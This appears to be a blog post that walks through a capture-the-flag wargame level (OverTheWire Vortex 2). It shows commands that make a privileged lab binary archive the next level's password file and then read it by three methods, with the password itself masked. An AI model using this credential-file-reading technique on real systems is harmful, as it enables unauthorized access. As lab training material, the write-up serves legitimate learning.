This binary file has permissions to read the password file from the next level, so what we have to do is archive the password file, and then read it, taking into account the special file name.
First, to create the archive:
vortex2@melissa:/etc/vortex_pass$ /vortex/vortex2 vortex3 vortex3 vortex3 vortex2@melissa:/etc/vortex_pass$ ls -alh '/tmp/ownership.$$.tar' -rw-r--r-- 1 vortex3 vortex2 10K 2012-09-06 23:19 /tmp/ownership.$$.tarFile create. Now to untar and read the content:
Method 1)
We cannot untar it there, so the -O (output to STDOUT) option is very useful :vortex2@melissa:/etc/vortex_pass$ tar xf '/tmp/ownership.$$.tar' -O *****
Method 2)
We could copy it locally with scp and untar it. I had a little problem with the file name passed forward by scp, which can be seen and adapted with verbose mode, then check the transmitted file name and adjust it:
scp -v vortex2@vortex.labs.overthewire.org:'test$$' . ... debug1: Sending command: scp -v -f test$$ scp: test415: No such file or directory ...We see that $$ is transmitted, and will be interpreted, so it should be correctly escaped. Copy archive locally:
# scp vortex2@vortex.labs.overthewire.org:'/tmp/ownership.\$\$.tar' .
Method 3)
tar command from the binary does not use compression, so the content of the archive can be viewed:vortex2@melissa:/etc/vortex_pass$ cat '/tmp/ownership.$$.tar' ...
No comments:
Post a Comment